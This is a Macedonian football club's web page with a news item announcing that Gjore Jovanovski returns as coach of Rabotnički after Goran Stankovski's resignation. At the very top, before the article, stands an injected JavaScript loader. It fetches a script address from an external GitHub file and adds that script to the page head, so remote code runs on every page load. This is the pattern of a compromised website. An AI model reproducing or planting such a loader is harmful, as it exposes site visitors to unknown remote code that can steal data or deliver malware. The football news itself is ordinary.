;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Ѓоре Јовановски се враќа на кормилото на Работнички
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Ѓоре Јовановски се враќа на кормилото на Работнички

Прославеното име на македонскиот фудбал и поранешен селектор, Ѓоре Јовановски е именуван за нов тренер на Работнички. По оставката на Горан Станковски, искусниот Јовановски ќе ги води „романтичарите“ до крајот на актуелнава сезона.

„По поднесената оставка од Горан Станковски раководството на Работнички на синоќешниот состанок одлучи до крајот на сезоната тимот да го води Ѓоре Јовановски. На Станковски искрено му заблагодаруваме на досегашната соработка, посакувајќи му успешна кариера во иднина“ – вели претседателот на Работнички, Драган Поповски дополнувајќи дека изборот е паднат на искусниот стратег кој до крајот на актуелниот шампионат треба да го врати тимот резултатски во живот.

„Јовановски се враќа во добро позната средина. Веруваме дека може многу да донесе пред се зa психолошко враќање на екипата. Се договоривме за соработка до крајот на сезоната, а потоа од јуни ќе размислуваме за евентуално продолжување на истата“ – истакнува Поповски.

Ѓоре Јовановски по третпат се враќа на клупата на нашиот тим откако беше на чело од 2003 до 2007 година, а потоа го водеше и во сезоната 2011/2012.

Прв асистент на новиот стратег ќе биде поранешниот фудбалер на клубот Зоран Јовановски. Првиот собир со тимот Ѓоре Јовановски ќе го има денеска во 14 часот во клупските простории, а од 15 часот ќе биде одржан и првиот тренинг со новиот шеф на стручниот штаб.